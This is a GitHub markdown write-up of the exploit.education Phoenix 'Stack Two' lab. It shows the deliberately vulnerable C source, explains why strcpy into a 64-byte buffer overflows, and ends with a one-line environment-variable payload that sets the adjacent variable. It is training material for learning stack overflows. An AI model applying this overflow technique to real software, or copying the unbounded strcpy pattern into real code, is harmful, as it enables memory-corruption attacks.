Skip to content

Latest commit

 

History

History
110 lines (79 loc) · 2.98 KB

stacktwo.md

File metadata and controls

110 lines (79 loc) · 2.98 KB
description
07/18/2023

2⃣ Stack Two

Stack Two takes a look at environment variables, and how they can be set.

Source Code

/*
 * phoenix/stack-two, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable to 0x0d0a090a
 *
 * If you're Russian to get to the bath room, and you are Finnish when you get
 * out, what are you when you are in the bath room?
 *
 * European!
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  char *ptr;

  printf("%s\n", BANNER);

  ptr = getenv("ExploitEducation");
  if (ptr == NULL) {
    errx(1, "please set the ExploitEducation environment variable");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, ptr);

  if (locals.changeme == 0x0d0a090a) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Almost! changeme is currently 0x%08x, we want 0x0d0a090a\n",
        locals.changeme);
  }

  exit(0);
}

Judging from the description, we need to overflow our buffer with an environment variable.

Source Code Analysis

A pointer (ptr) is pointing to a string (char) in the environment variable of "ExploitEducation".

strcpy() will then copy the variable contained in the buffer.

  • strcpy() is dangerous because it does not specify the size of the destination array
  • A.K.A, buffer overflow territory
  • Hex: 0x0d0a090a
Little Endian: \x0a\x09\x0a\x0d

Snippet to focus on:

  ptr = getenv("ExploitEducation");
  if (ptr == NULL) {
    errx(1, "please set the ExploitEducation environment variable");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, ptr);

  if (locals.changeme == 0x0d0a090a) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Almost! changeme is currently 0x%08x, we want 0x0d0a090a\n",
        locals.changeme);
  }

Exploitation

I like to keep things as simple as possible and try to use one-liners whenever possible, since I didn't know this one off the top of my head, I asked ChatGPT:

Let's see if we can set our variable and then execute our binary immediately after on the same line:

ExploitEducation=$(python -c 'print "X"*64 + "\x0a\x09\x0a\x0d"') ./stack-two